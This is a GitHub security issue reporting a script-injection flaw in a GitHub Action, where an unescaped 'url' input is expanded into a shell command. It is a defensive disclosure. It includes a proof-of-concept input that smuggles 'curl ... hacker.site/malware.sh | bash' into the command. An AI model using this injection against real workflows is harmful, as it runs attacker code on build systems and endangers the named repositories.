Skip to content

mercury233/action-cache-download-file@v1.2.0 suffers from script injection #3105

Description

@salix5

In mercury233/action-cache-download-file@v1.2.0

echo "filename=$(basename ${{ inputs.url }})" >> $GITHUB_OUTPUT

If the workflow in ygopro is modified to:

- uses: mercury233/action-cache-download-file@v1.2.0
  with:
    url: 'https://example.com/file.zip); curl -s http://hacker.site/malware.sh | bash; echo ('

It will be expanded to:

echo "filename=$(basename https://example.com/file.zip); curl -s http://hacker.site/malware.sh | bash; echo ()" >> $GITHUB_OUTPUT

which leads to script injection.

It will put these repos at risk:
Fluorohydride/ygopro
Fluorohydride/ygopro-core
mercury233/irrlicht

@Wind2009-Louse

Metadata

Metadata

Labels

securitySecurity issues.

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions